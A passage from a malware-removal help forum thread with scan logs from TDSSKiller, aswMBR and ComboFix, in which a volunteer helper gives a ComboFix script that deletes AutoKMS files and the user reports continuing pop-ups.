16:50:33.0336 5136 RTL8167 (ee082e06a82ff630351d1e0ebbd3d8d0) C:\Windows\system32\DRIVERS\Rt64win7.sys
16:50:33.0336 5136 RTL8167 - ok
16:50:33.0382 5136 s3cap (e60c0a09f997826c7627b244195ab581) C:\Windows\system32\drivers\vms3cap.sys
16:50:33.0382 5136 s3cap - ok
16:50:33.0414 5136 SamSs (c118a82cd78818c29ab228366ebf81c3) C:\Windows\system32\lsass.exe
16:50:33.0414 5136 SamSs - ok
16:50:33.0523 5136 SbieDrv (0fe05dd9bbf0782e2bbf0977f2034616) C:\Program Files\Sandboxie\SbieDrv.sys
16:50:33.0523 5136 SbieDrv - ok
16:50:33.0585 5136 SbieSvc (c970c7b2fd2e811525d4578d50b535f5) C:\Program Files\Sandboxie\SbieSvc.exe
16:50:33.0585 5136 SbieSvc - ok
16:50:33.0632 5136 sbp2port (ac03af3329579fffb455aa2daabbe22b) C:\Windows\system32\drivers\sbp2port.sys
16:50:33.0632 5136 sbp2port - ok
16:50:33.0772 5136 SBSDWSCService (794d4b48dfb6e999537c7c3947863463) C:\Program Files (x86)\Spybot - Search & Destroy\SDWinSec.exe
16:50:33.0772 5136 SBSDWSCService - ok
16:50:33.0835 5136 SCardSvr (9b7395789e3791a3b6d000fe6f8b131e) C:\Windows\System32\SCardSvr.dll
16:50:33.0835 5136 SCardSvr - ok
16:50:33.0882 5136 scfilter (253f38d0d7074c02ff8deb9836c97d2b) C:\Windows\system32\DRIVERS\scfilter.sys
16:50:33.0882 5136 scfilter - ok
16:50:33.0928 5136 Schedule (262f6592c3299c005fd6bec90fc4463a) C:\Windows\system32\schedsvc.dll
16:50:33.0944 5136 Schedule - ok
16:50:33.0991 5136 SCPolicySvc (f17d1d393bbc69c5322fbfafaca28c7f) C:\Windows\System32\certprop.dll
16:50:33.0991 5136 SCPolicySvc - ok
16:50:34.0022 5136 SDRSVC (6ea4234dc55346e0709560fe7c2c1972) C:\Windows\System32\SDRSVC.dll
16:50:34.0022 5136 SDRSVC - ok
16:50:34.0053 5136 secdrv (3ea8a16169c26afbeb544e0e48421186) C:\Windows\system32\drivers\secdrv.sys
16:50:34.0053 5136 secdrv - ok
16:50:34.0116 5136 seclogon (bc617a4e1b4fa8df523a061739a0bd87) C:\Windows\system32\seclogon.dll
16:50:34.0116 5136 seclogon - ok
16:50:34.0147 5136 SENS (c32ab8fa018ef34c0f113bd501436d21) C:\Windows\system32\sens.dll
16:50:34.0147 5136 SENS - ok
16:50:34.0162 5136 SensrSvc (0336cffafaab87a11541f1cf1594b2b2) C:\Windows\system32\sensrsvc.dll
16:50:34.0162 5136 SensrSvc - ok
16:50:34.0194 5136 Serenum (cb624c0035412af0debec78c41f5ca1b) C:\Windows\system32\DRIVERS\serenum.sys
16:50:34.0194 5136 Serenum - ok
16:50:34.0225 5136 Serial (c1d8e28b2c2adfaec4ba89e9fda69bd6) C:\Windows\system32\DRIVERS\serial.sys
16:50:34.0225 5136 Serial - ok
16:50:34.0256 5136 sermouse (1c545a7d0691cc4a027396535691c3e3) C:\Windows\system32\DRIVERS\sermouse.sys
16:50:34.0256 5136 sermouse - ok
16:50:34.0303 5136 SessionEnv (0b6231bf38174a1628c4ac812cc75804) C:\Windows\system32\sessenv.dll
16:50:34.0303 5136 SessionEnv - ok
16:50:34.0350 5136 sffdisk (a554811bcd09279536440c964ae35bbf) C:\Windows\system32\drivers\sffdisk.sys
16:50:34.0350 5136 sffdisk - ok
16:50:34.0381 5136 sffp_mmc (ff414f0baefeba59bc6c04b3db0b87bf) C:\Windows\system32\drivers\sffp_mmc.sys
16:50:34.0381 5136 sffp_mmc - ok
16:50:34.0396 5136 sffp_sd (dd85b78243a19b59f0637dcf284da63c) C:\Windows\system32\drivers\sffp_sd.sys
16:50:34.0396 5136 sffp_sd - ok
16:50:34.0443 5136 sfloppy (a9d601643a1647211a1ee2ec4e433ff4) C:\Windows\system32\DRIVERS\sfloppy.sys
16:50:34.0443 5136 sfloppy - ok
16:50:34.0506 5136 SharedAccess (b95f6501a2f8b2e78c697fec401970ce) C:\Windows\System32\ipnathlp.dll
16:50:34.0521 5136 SharedAccess - ok
16:50:34.0537 5136 ShellHWDetection (aaf932b4011d14052955d4b212a4da8d) C:\Windows\System32\shsvcs.dll
16:50:34.0552 5136 ShellHWDetection - ok
16:50:34.0584 5136 SiSRaid2 (843caf1e5fde1ffd5ff768f23a51e2e1) C:\Windows\system32\DRIVERS\SiSRaid2.sys
16:50:34.0584 5136 SiSRaid2 - ok
16:50:34.0599 5136 SiSRaid4 (6a6c106d42e9ffff8b9fcb4f754f6da4) C:\Windows\system32\DRIVERS\sisraid4.sys
16:50:34.0599 5136 SiSRaid4 - ok
16:50:34.0615 5136 Smb (548260a7b8654e024dc30bf8a7c5baa4) C:\Windows\system32\DRIVERS\smb.sys
16:50:34.0615 5136 Smb - ok
16:50:34.0677 5136 SNMPTRAP (6313f223e817cc09aa41811daa7f541d) C:\Windows\System32\snmptrap.exe
16:50:34.0677 5136 SNMPTRAP - ok
16:50:34.0724 5136 spldr (b9e31e5cacdfe584f34f730a677803f9) C:\Windows\system32\drivers\spldr.sys
16:50:34.0724 5136 spldr - ok
16:50:34.0755 5136 Spooler (b96c17b5dc1424d56eea3a99e97428cd) C:\Windows\System32\spoolsv.exe
16:50:34.0755 5136 Spooler - ok
16:50:34.0896 5136 sppsvc (e17e0188bb90fae42d83e98707efa59c) C:\Windows\system32\sppsvc.exe
16:50:34.0942 5136 sppsvc - ok
16:50:34.0989 5136 sppuinotify (93d7d61317f3d4bc4f4e9f8a96a7de45) C:\Windows\system32\sppuinotify.dll
16:50:35.0005 5136 sppuinotify - ok
16:50:35.0067 5136 srv (441fba48bff01fdb9d5969ebc1838f0b) C:\Windows\system32\DRIVERS\srv.sys
16:50:35.0083 5136 srv - ok
16:50:35.0098 5136 srv2 (b4adebbf5e3677cce9651e0f01f7cc28) C:\Windows\system32\DRIVERS\srv2.sys
16:50:35.0098 5136 srv2 - ok
16:50:35.0114 5136 srvnet (27e461f0be5bff5fc737328f749538c3) C:\Windows\system32\DRIVERS\srvnet.sys
16:50:35.0114 5136 srvnet - ok
16:50:35.0145 5136 SSDPSRV (51b52fbd583cde8aa9ba62b8b4298f33) C:\Windows\System32\ssdpsrv.dll
16:50:35.0161 5136 SSDPSRV - ok
16:50:35.0176 5136 SstpSvc (ab7aebf58dad8daab7a6c45e6a8885cb) C:\Windows\system32\sstpsvc.dll
16:50:35.0176 5136 SstpSvc - ok
16:50:35.0239 5136 STacSV (7595d53ee8e8b0baa9a2ddde867ebb0c) C:\Windows\System32\DriverStore\FileRepository\stwrt64.inf_amd64_neutral_960c1f056a541068\STacSV64.exe
16:50:35.0239 5136 STacSV - ok
16:50:35.0270 5136 stexstor (f3817967ed533d08327dc73bc4d5542a) C:\Windows\system32\DRIVERS\stexstor.sys
16:50:35.0270 5136 stexstor - ok
16:50:35.0348 5136 STHDA (dffbc024dfc7bb05b2129e05cbc7a201) C:\Windows\system32\DRIVERS\stwrt64.sys
16:50:35.0364 5136 STHDA - ok
16:50:35.0410 5136 stisvc (8dd52e8e6128f4b2da92ce27402871c1) C:\Windows\System32\wiaservc.dll
16:50:35.0426 5136 stisvc - ok
16:50:35.0457 5136 storflt (7785dc213270d2fc066538daf94087e7) C:\Windows\system32\drivers\vmstorfl.sys
16:50:35.0457 5136 storflt - ok
16:50:35.0488 5136 storvsc (d34e4943d5ac096c8edeebfd80d76e23) C:\Windows\system32\drivers\storvsc.sys
16:50:35.0488 5136 storvsc - ok
16:50:35.0520 5136 swenum (d01ec09b6711a5f8e7e6564a4d0fbc90) C:\Windows\system32\drivers\swenum.sys
16:50:35.0520 5136 swenum - ok
16:50:35.0629 5136 SwitchBoard (f577910a133a592234ebaad3f3afa258) C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe
16:50:35.0629 5136 SwitchBoard - ok
16:50:35.0722 5136 swprv (e08e46fdd841b7184194011ca1955a0b) C:\Windows\System32\swprv.dll
16:50:35.0722 5136 swprv - ok
16:50:35.0785 5136 Synth3dVsc - ok
16:50:35.0847 5136 SysMain (bf9ccc0bf39b418c8d0ae8b05cf95b7d) C:\Windows\system32\sysmain.dll
16:50:35.0878 5136 SysMain - ok
16:50:35.0910 5136 TabletInputService (e3c61fd7b7c2557e1f1b0b4cec713585) C:\Windows\System32\TabSvc.dll
16:50:35.0910 5136 TabletInputService - ok
16:50:35.0972 5136 TapiSrv (40f0849f65d13ee87b9a9ae3c1dd6823) C:\Windows\System32\tapisrv.dll
16:50:35.0972 5136 TapiSrv - ok
16:50:36.0019 5136 TBS (1be03ac720f4d302ea01d40f588162f6) C:\Windows\System32\tbssvc.dll
16:50:36.0019 5136 TBS - ok
16:50:36.0081 5136 Tcpip (fc62769e7bff2896035aeed399108162) C:\Windows\system32\drivers\tcpip.sys
16:50:36.0112 5136 Tcpip - ok
16:50:36.0159 5136 TCPIP6 (fc62769e7bff2896035aeed399108162) C:\Windows\system32\DRIVERS\tcpip.sys
16:50:36.0175 5136 TCPIP6 - ok
16:50:36.0206 5136 tcpipreg (df687e3d8836bfb04fcc0615bf15a519) C:\Windows\system32\drivers\tcpipreg.sys
16:50:36.0206 5136 tcpipreg - ok
16:50:36.0237 5136 TDPIPE (3371d21011695b16333a3934340c4e7c) C:\Windows\system32\drivers\tdpipe.sys
16:50:36.0237 5136 TDPIPE - ok
16:50:36.0284 5136 TDTCP (51c5eceb1cdee2468a1748be550cfbc8) C:\Windows\system32\drivers\tdtcp.sys
16:50:36.0284 5136 TDTCP - ok
16:50:36.0315 5136 tdx (ddad5a7ab24d8b65f8d724f5c20fd806) C:\Windows\system32\DRIVERS\tdx.sys
16:50:36.0315 5136 tdx - ok
16:50:36.0362 5136 TermDD (561e7e1f06895d78de991e01dd0fb6e5) C:\Windows\system32\drivers\termdd.sys
16:50:36.0362 5136 TermDD - ok
16:50:36.0409 5136 TermService (2e648163254233755035b46dd7b89123) C:\Windows\System32\termsrv.dll
16:50:36.0424 5136 TermService - ok
16:50:36.0471 5136 Themes (f0344071948d1a1fa732231785a0664c) C:\Windows\system32\themeservice.dll
16:50:36.0471 5136 Themes - ok
16:50:36.0502 5136 THREADORDER (e40e80d0304a73e8d269f7141d77250b) C:\Windows\system32\mmcss.dll
16:50:36.0502 5136 THREADORDER - ok
16:50:36.0534 5136 TrkWks (7e7afd841694f6ac397e99d75cead49d) C:\Windows\System32\trkwks.dll
16:50:36.0534 5136 TrkWks - ok
16:50:36.0565 5136 TrustedInstaller (773212b2aaa24c1e31f10246b15b276c) C:\Windows\servicing\TrustedInstaller.exe
16:50:36.0565 5136 TrustedInstaller - ok
16:50:36.0612 5136 tssecsrv (ce18b2cdfc837c99e5fae9ca6cba5d30) C:\Windows\system32\DRIVERS\tssecsrv.sys
16:50:36.0612 5136 tssecsrv - ok
16:50:36.0643 5136 TsUsbFlt (d11c783e3ef9a3c52c0ebe83cc5000e9) C:\Windows\system32\drivers\tsusbflt.sys
16:50:36.0643 5136 TsUsbFlt - ok
16:50:36.0658 5136 tsusbhub - ok
16:50:36.0799 5136 TuneUp.UtilitiesSvc (8d4cc6a5c51acb30f801f78f694c7ea5) C:\Program Files (x86)\TuneUp Utilities 2012\TuneUpUtilitiesService64.exe
16:50:36.0814 5136 TuneUp.UtilitiesSvc - ok
16:50:36.0861 5136 TuneUpUtilitiesDrv (dcc94c51d27c7ec0dadeca8f64c94fcf) C:\Program Files (x86)\TuneUp Utilities 2012\TuneUpUtilitiesDriver64.sys
16:50:36.0861 5136 TuneUpUtilitiesDrv - ok
16:50:36.0970 5136 tunnel (3566a8daafa27af944f5d705eaa64894) C:\Windows\system32\DRIVERS\tunnel.sys
16:50:36.0970 5136 tunnel - ok
16:50:37.0002 5136 uagp35 (b4dd609bd7e282bfc683cec7eaaaad67) C:\Windows\system32\DRIVERS\uagp35.sys
16:50:37.0017 5136 uagp35 - ok
16:50:37.0033 5136 udfs (ff4232a1a64012baa1fd97c7b67df593) C:\Windows\system32\DRIVERS\udfs.sys
16:50:37.0048 5136 udfs - ok
16:50:37.0080 5136 UI0Detect (3cbdec8d06b9968aba702eba076364a1) C:\Windows\system32\UI0Detect.exe
16:50:37.0080 5136 UI0Detect - ok
16:50:37.0111 5136 uliagpkx (4bfe1bc28391222894cbf1e7d0e42320) C:\Windows\system32\drivers\uliagpkx.sys
16:50:37.0111 5136 uliagpkx - ok
16:50:37.0158 5136 umbus (dc54a574663a895c8763af0fa1ff7561) C:\Windows\system32\DRIVERS\umbus.sys
16:50:37.0158 5136 umbus - ok
16:50:37.0173 5136 UmPass (b2e8e8cb557b156da5493bbddcc1474d) C:\Windows\system32\DRIVERS\umpass.sys
16:50:37.0173 5136 UmPass - ok
16:50:37.0220 5136 UmRdpService (a293dcd756d04d8492a750d03b9a297c) C:\Windows\System32\umrdp.dll
16:50:37.0220 5136 UmRdpService - ok
16:50:37.0282 5136 upnphost (d47ec6a8e81633dd18d2436b19baf6de) C:\Windows\System32\upnphost.dll
16:50:37.0282 5136 upnphost - ok
16:50:37.0329 5136 usbccgp (6f1a3157a1c89435352ceb543cdb359c) C:\Windows\system32\DRIVERS\usbccgp.sys
16:50:37.0329 5136 usbccgp - ok
16:50:37.0376 5136 usbcir (af0892a803fdda7492f595368e3b68e7) C:\Windows\system32\drivers\usbcir.sys
16:50:37.0376 5136 usbcir - ok
16:50:37.0392 5136 usbehci (c025055fe7b87701eb042095df1a2d7b) C:\Windows\system32\DRIVERS\usbehci.sys
16:50:37.0392 5136 usbehci - ok
16:50:37.0407 5136 usbhub (287c6c9410b111b68b52ca298f7b8c24) C:\Windows\system32\DRIVERS\usbhub.sys
16:50:37.0423 5136 usbhub - ok
16:50:37.0454 5136 usbohci (9840fc418b4cbd632d3d0a667a725c31) C:\Windows\system32\drivers\usbohci.sys
16:50:37.0454 5136 usbohci - ok
16:50:37.0485 5136 usbprint (73188f58fb384e75c4063d29413cee3d) C:\Windows\system32\DRIVERS\usbprint.sys
16:50:37.0485 5136 usbprint - ok
16:50:37.0516 5136 USBSTOR (fed648b01349a3c8395a5169db5fb7d6) C:\Windows\system32\DRIVERS\USBSTOR.SYS
16:50:37.0516 5136 USBSTOR - ok
16:50:37.0532 5136 usbuhci (62069a34518bcf9c1fd9e74b3f6db7cd) C:\Windows\system32\DRIVERS\usbuhci.sys
16:50:37.0532 5136 usbuhci - ok
16:50:37.0579 5136 usbvideo (454800c2bc7f3927ce030141ee4f4c50) C:\Windows\System32\Drivers\usbvideo.sys
16:50:37.0579 5136 usbvideo - ok
16:50:37.0641 5136 usb_rndisx (70d05ee263568a742d14e1876df80532) C:\Windows\system32\DRIVERS\usb8023x.sys
16:50:37.0641 5136 usb_rndisx - ok
16:50:37.0672 5136 UxSms (edbb23cbcf2cdf727d64ff9b51a6070e) C:\Windows\System32\uxsms.dll
16:50:37.0672 5136 UxSms - ok
16:50:37.0735 5136 UxTuneUp (31b569584d79c8d36e64dd467090f90f) C:\Windows\System32\uxtuneup.dll
16:50:37.0735 5136 UxTuneUp - ok
16:50:37.0782 5136 VaultSvc (c118a82cd78818c29ab228366ebf81c3) C:\Windows\system32\lsass.exe
16:50:37.0782 5136 VaultSvc - ok
16:50:37.0797 5136 vdrvroot (c5c876ccfc083ff3b128f933823e87bd) C:\Windows\system32\drivers\vdrvroot.sys
16:50:37.0797 5136 vdrvroot - ok
16:50:37.0844 5136 vds (8d6b481601d01a456e75c3210f1830be) C:\Windows\System32\vds.exe
16:50:37.0860 5136 vds - ok
16:50:37.0891 5136 vga (da4da3f5e02943c2dc8c6ed875de68dd) C:\Windows\system32\DRIVERS\vgapnp.sys
16:50:37.0891 5136 vga - ok
16:50:37.0953 5136 VgaSave (53e92a310193cb3c03bea963de7d9cfc) C:\Windows\System32\drivers\vga.sys
16:50:37.0953 5136 VgaSave - ok
16:50:38.0000 5136 VGPU - ok
16:50:38.0031 5136 vhdmp (2ce2df28c83aeaf30084e1b1eb253cbb) C:\Windows\system32\drivers\vhdmp.sys
16:50:38.0047 5136 vhdmp - ok
16:50:38.0078 5136 viaide (e5689d93ffe4e5d66c0178761240dd54) C:\Windows\system32\drivers\viaide.sys
16:50:38.0078 5136 viaide - ok
16:50:38.0078 5136 vmbus (86ea3e79ae350fea5331a1303054005f) C:\Windows\system32\drivers\vmbus.sys
16:50:38.0094 5136 vmbus - ok
16:50:38.0109 5136 VMBusHID (7de90b48f210d29649380545db45a187) C:\Windows\system32\drivers\VMBusHID.sys
16:50:38.0109 5136 VMBusHID - ok
16:50:38.0125 5136 volmgr (d2aafd421940f640b407aefaaebd91b0) C:\Windows\system32\drivers\volmgr.sys
16:50:38.0125 5136 volmgr - ok
16:50:38.0172 5136 volmgrx (a255814907c89be58b79ef2f189b843b) C:\Windows\system32\drivers\volmgrx.sys
16:50:38.0172 5136 volmgrx - ok
16:50:38.0187 5136 volsnap (0d08d2f3b3ff84e433346669b5e0f639) C:\Windows\system32\drivers\volsnap.sys
16:50:38.0203 5136 volsnap - ok
16:50:38.0234 5136 vsmraid (5e2016ea6ebaca03c04feac5f330d997) C:\Windows\system32\DRIVERS\vsmraid.sys
16:50:38.0234 5136 vsmraid - ok
16:50:38.0281 5136 VSS (b60ba0bc31b0cb414593e169f6f21cc2) C:\Windows\system32\vssvc.exe
16:50:38.0312 5136 VSS - ok
16:50:38.0406 5136 vwifibus (36d4720b72b5c5d9cb2b9c29e9df67a1) C:\Windows\system32\DRIVERS\vwifibus.sys
16:50:38.0406 5136 vwifibus - ok
16:50:38.0452 5136 vwififlt (6a3d66263414ff0d6fa754c646612f3f) C:\Windows\system32\DRIVERS\vwififlt.sys
16:50:38.0452 5136 vwififlt - ok
16:50:38.0499 5136 W32Time (1c9d80cc3849b3788048078c26486e1a) C:\Windows\system32\w32time.dll
16:50:38.0499 5136 W32Time - ok
16:50:38.0530 5136 WacomPen (4e9440f4f152a7b944cb1663d3935a3e) C:\Windows\system32\DRIVERS\wacompen.sys
16:50:38.0530 5136 WacomPen - ok
16:50:38.0562 5136 WANARP (356afd78a6ed4457169241ac3965230c) C:\Windows\system32\DRIVERS\wanarp.sys
16:50:38.0562 5136 WANARP - ok
16:50:38.0562 5136 Wanarpv6 (356afd78a6ed4457169241ac3965230c) C:\Windows\system32\DRIVERS\wanarp.sys
16:50:38.0562 5136 Wanarpv6 - ok
16:50:38.0624 5136 WatAdminSvc (3cec96de223e49eaae3651fcf8faea6c) C:\Windows\system32\Wat\WatAdminSvc.exe
16:50:38.0655 5136 WatAdminSvc - ok
16:50:38.0764 5136 wbengine (78f4e7f5c56cb9716238eb57da4b6a75) C:\Windows\system32\wbengine.exe
16:50:38.0780 5136 wbengine - ok
16:50:38.0811 5136 WbioSrvc (3aa101e8edab2db4131333f4325c76a3) C:\Windows\System32\wbiosrvc.dll
16:50:38.0811 5136 WbioSrvc - ok
16:50:38.0842 5136 wcncsvc (7368a2afd46e5a4481d1de9d14848edd) C:\Windows\System32\wcncsvc.dll
16:50:38.0858 5136 wcncsvc - ok
16:50:38.0858 5136 WcsPlugInService (20f7441334b18cee52027661df4a6129) C:\Windows\System32\WcsPlugInService.dll
16:50:38.0858 5136 WcsPlugInService - ok
16:50:38.0889 5136 Wd (72889e16ff12ba0f235467d6091b17dc) C:\Windows\system32\DRIVERS\wd.sys
16:50:38.0889 5136 Wd - ok
16:50:38.0920 5136 WDC_SAM (a3d04ebf5227886029b4532f20d026f7) C:\Windows\system32\DRIVERS\wdcsam64.sys
16:50:38.0936 5136 WDC_SAM - ok
16:50:38.0983 5136 Wdf01000 (441bd2d7b4f98134c3a4f9fa570fd250) C:\Windows\system32\drivers\Wdf01000.sys
16:50:38.0983 5136 Wdf01000 - ok
16:50:39.0014 5136 WdiServiceHost (bf1fc3f79b863c914687a737c2f3d681) C:\Windows\system32\wdi.dll
16:50:39.0030 5136 WdiServiceHost - ok
16:50:39.0030 5136 WdiSystemHost (bf1fc3f79b863c914687a737c2f3d681) C:\Windows\system32\wdi.dll
16:50:39.0030 5136 WdiSystemHost - ok
16:50:39.0045 5136 WebClient (3db6d04e1c64272f8b14eb8bc4616280) C:\Windows\System32\webclnt.dll
16:50:39.0061 5136 WebClient - ok
16:50:39.0061 5136 Wecsvc (c749025a679c5103e575e3b48e092c43) C:\Windows\system32\wecsvc.dll
16:50:39.0076 5136 Wecsvc - ok
16:50:39.0092 5136 wercplsupport (7e591867422dc788b9e5bd337a669a08) C:\Windows\System32\wercplsupport.dll
16:50:39.0092 5136 wercplsupport - ok
16:50:39.0123 5136 WerSvc (6d137963730144698cbd10f202e9f251) C:\Windows\System32\WerSvc.dll
16:50:39.0123 5136 WerSvc - ok
16:50:39.0154 5136 WfpLwf (611b23304bf067451a9fdee01fbdd725) C:\Windows\system32\DRIVERS\wfplwf.sys
16:50:39.0154 5136 WfpLwf - ok
16:50:39.0170 5136 WIMMount (05ecaec3e4529a7153b3136ceb49f0ec) C:\Windows\system32\drivers\wimmount.sys
16:50:39.0170 5136 WIMMount - ok
16:50:39.0232 5136 WinDefend - ok
16:50:39.0248 5136 WinHttpAutoProxySvc - ok
16:50:39.0295 5136 Winmgmt (19b07e7e8915d701225da41cb3877306) C:\Windows\system32\wbem\WMIsvc.dll
16:50:39.0295 5136 Winmgmt - ok
16:50:39.0357 5136 WinRM (bcb1310604aa415c4508708975b3931e) C:\Windows\system32\WsmSvc.dll
16:50:39.0388 5136 WinRM - ok
16:50:39.0498 5136 WinUsb (fe88b288356e7b47b74b13372add906d) C:\Windows\system32\DRIVERS\WinUsb.sys
16:50:39.0498 5136 WinUsb - ok
16:50:39.0544 5136 Wlansvc (4fada86e62f18a1b2f42ba18ae24e6aa) C:\Windows\System32\wlansvc.dll
16:50:39.0560 5136 Wlansvc - ok
16:50:39.0654 5136 wlidsvc (2bacd71123f42cea603f4e205e1ae337) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
16:50:39.0669 5136 wlidsvc - ok
16:50:39.0763 5136 WmiAcpi (f6ff8944478594d0e414d3f048f0d778) C:\Windows\system32\drivers\wmiacpi.sys
16:50:39.0763 5136 WmiAcpi - ok
16:50:39.0810 5136 wmiApSrv (38b84c94c5a8af291adfea478ae54f93) C:\Windows\system32\wbem\WmiApSrv.exe
16:50:39.0810 5136 wmiApSrv - ok
16:50:39.0888 5136 WMPNetworkSvc - ok
16:50:39.0919 5136 WPCSvc (96c6e7100d724c69fcf9e7bf590d1dca) C:\Windows\System32\wpcsvc.dll
16:50:39.0919 5136 WPCSvc - ok
16:50:39.0950 5136 WPDBusEnum (93221146d4ebbf314c29b23cd6cc391d) C:\Windows\system32\wpdbusenum.dll
16:50:39.0950 5136 WPDBusEnum - ok
16:50:39.0981 5136 ws2ifsl (6bcc1d7d2fd2453957c5479a32364e52) C:\Windows\system32\drivers\ws2ifsl.sys
16:50:39.0981 5136 ws2ifsl - ok
16:50:39.0997 5136 wscsvc (e8b1fe6669397d1772d8196df0e57a9e) C:\Windows\system32\wscsvc.dll
16:50:40.0012 5136 wscsvc - ok
16:50:40.0012 5136 WSearch - ok
16:50:40.0090 5136 wuauserv (9df12edbc698b0bc353b3ef84861e430) C:\Windows\system32\wuaueng.dll
16:50:40.0122 5136 wuauserv - ok
16:50:40.0215 5136 WudfPf (d3381dc54c34d79b22cee0d65ba91b7c) C:\Windows\system32\drivers\WudfPf.sys
16:50:40.0215 5136 WudfPf - ok
16:50:40.0262 5136 WUDFRd (cf8d590be3373029d57af80914190682) C:\Windows\system32\DRIVERS\WUDFRd.sys
16:50:40.0262 5136 WUDFRd - ok
16:50:40.0278 5136 wudfsvc (7a95c95b6c4cf292d689106bcae49543) C:\Windows\System32\WUDFSvc.dll
16:50:40.0278 5136 wudfsvc - ok
16:50:40.0309 5136 WwanSvc (9a3452b3c2a46c073166c5cf49fad1ae) C:\Windows\System32\wwansvc.dll
16:50:40.0324 5136 WwanSvc - ok
16:50:40.0356 5136 MBR (0x1B8) (a36c5e4f47e84449ff07ed3517b43a31) \Device\Harddisk0\DR0
16:50:40.0418 5136 \Device\Harddisk0\DR0 - ok
16:50:40.0418 5136 Boot (0x1200) (13ba98a2e471d5899beaa683cb9916ea) \Device\Harddisk0\DR0\Partition0
16:50:40.0418 5136 \Device\Harddisk0\DR0\Partition0 - ok
16:50:40.0434 5136 Boot (0x1200) (c56b5c47191a459af110c191da69601d) \Device\Harddisk0\DR0\Partition1
16:50:40.0434 5136 \Device\Harddisk0\DR0\Partition1 - ok
16:50:40.0434 5136 ============================================================
16:50:40.0434 5136 Scan finished
16:50:40.0434 5136 ============================================================
16:50:40.0449 1484 Detected object count: 0
16:50:40.0449 1484 Actual detected object count: 0
16:51:54.0750 4212 Deinitialize success

aswMBR:

aswMBR version 0.9.9.1665 Copyright© 2011 AVAST Software
Run date: 2012-04-17 16:52:23
-----------------------------
16:52:23.083 OS Version: Windows x64 6.1.7601 Service Pack 1
16:52:23.083 Number of processors: 2 586 0x170A
16:52:23.083 ComputerName: VINCENT-PC UserName: Vincent
16:52:24.565 Initialize success
16:53:55.406 Disk 0 (boot) \Device\Harddisk0\DR0 -> \Device\Ide\IdeDeviceP0T0L0-0
16:53:55.406 Disk 0 Vendor: Hitachi_HTS723232L9A360 FC4OC60D Size: 305245MB BusType: 11
16:53:55.421 Disk 0 MBR read successfully
16:53:55.421 Disk 0 MBR scan
16:53:55.437 Disk 0 Windows 7 default MBR code
16:53:55.437 Disk 0 Partition 1 80 (A) 07 HPFS/NTFS NTFS 199 MB offset 2048
16:53:55.453 Disk 0 Partition 2 00 07 HPFS/NTFS NTFS 305043 MB offset 409600
16:53:55.468 Disk 0 scanning C:\Windows\system32\drivers
16:54:01.275 Service scanning
16:54:14.379 Modules scanning
16:54:14.379 Disk 0 trace - called modules:
16:54:14.394 ntoskrnl.exe CLASSPNP.SYS disk.sys ACPI.sys ataport.SYS PCIIDEX.SYS hal.dll msahci.sys
16:54:14.410 1 nt!IofCallDriver -> \Device\Harddisk0\DR0[0xfffffa8004c66060]
16:54:14.410 3 CLASSPNP.SYS[fffff8800198f43f] -> nt!IofCallDriver -> [0xfffffa8004ae5520]
16:54:14.925 5 ACPI.sys[fffff88000f5f7a1] -> nt!IofCallDriver -> \Device\Ide\IdeDeviceP0T0L0-0[0xfffffa8004ae1680]
16:54:14.925 Scan finished successfully
16:54:51.616 Disk 0 MBR has been saved successfully to "C:\Users\Vincent\Documents\BPC\MBR.dat"
16:54:51.632 The log file has been saved successfully to "C:\Users\Vincent\Documents\BPC\aswMBR.txt"

Vincent

#6 gringo_pr

gringo_pr

    Bleepin Gringo


  • Malware Response Team
  • 136,772 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Puerto rico
  • Local time:12:54 AM

Posted 17 April 2012 - 06:27 PM

Greetings

At this time I would like you to run this script for me and it is a good time to check out the computer to see if there is anything else that needs to be addressed.

:Run CFScript:

Open Notepad and copy/paste the text in the box into the window:

ClearJavaCache::
KillAll::
File::
c:\windows\Tasks\AutoKMS.job
c:\windows\AutoKMS.exe

Save it to your desktop as CFScript.txt

Refering to the picture above, drag CFScript.txt into ComboFix.exe
Posted Image
This will let ComboFix run again.
Restart if you have to.
Save the produced logfile to your desktop.

Note: Do not mouseclick combofix's window whilst it's running. That may cause it to stall

Note 2: If you recieve an error "Illegal operation attempted on a registery key that has been marked for deletion." Please restart the computer

"information and logs"

  • In your next post I need the following

  • report from Combofix
  • let me know of any problems you may have had
  • How is the computer doing now after running the script?

Gringo

I Close My Topics If You Have Not Replied In 5 Days If You Will Be Longer Please Let Me Know

If I Have Not Replied To One Of My Topics In 48 Hrs Please Bump The Topic



My help is free, however, if you wish to make a small donation to show your appreciation or to help me continue the fight against Malware, then click here -->btn_donate_SM.gif<-- Don't worry every little bit helps.

Proud Graduate Of Malware Removal University

#7 vinnie946

vinnie946
  • Topic Starter

  • Members
  • 5 posts
  • OFFLINE
  •  
  • Local time:04:54 AM

Posted 17 April 2012 - 07:46 PM

Hi

There seems to be more pop ups coming up now, 2 or 3 comes up at the same time.
Also, the computer seems to minimise full screen programs to show the desktop from time to time. Tried to play a game the other day, and noticed the computer has gotten slower (lower fps than normal).

I had to run the script twice, because ive forgotten to save the log the first time and restarted the pc :axe: .. hopefully that won't change anything?
The pop ups are still here after running the script.

Log:

ComboFix 12-04-16.02 - Vincent 18/04/2012 1:02.3.2 - x64
Microsoft Windows 7 Ultimate 6.1.7601.1.1252.44.1033.18.4063.2499 [GMT 1:00]
Running from: c:\users\Vincent\Documents\BPC\ComboFix.exe
Command switches used :: c:\users\Vincent\Documents\BPC\CFScript.txt
AV: ESET Smart Security 5.0 *Enabled/Updated* {77DEAFED-8149-104B-25A1-21771CA47CD1}
FW: ESET Personal firewall *Enabled* {4FE52EC8-CB26-1113-0EFE-8842E2773BAA}
SP: ESET Smart Security 5.0 *Enabled/Updated* {CCBF4E09-A773-1FC5-1F11-1A056723366C}
SP: Windows Defender *Enabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
* Resident AV is active
.
.
FILE ::
"c:\windows\AutoKMS.exe"
"c:\windows\Tasks\AutoKMS.job"
.
.
((((((((((((((((((((((((( Files Created from 2012-03-18 to 2012-04-18 )))))))))))))))))))))))))))))))
.
.
2012-04-18 00:10 . 2012-04-18 00:10 -------- d-----w- c:\users\Default\AppData\Local\temp
2012-04-17 19:26 . 2012-03-14 03:27 8669240 ----a-w- c:\programdata\Microsoft\Windows Defender\Definition Updates\{926034D1-776D-48FC-812B-9F774FDCFB4C}\mpengine.dll
2012-04-14 15:01 . 2012-04-14 15:01 -------- d-----r- C:\Sandbox
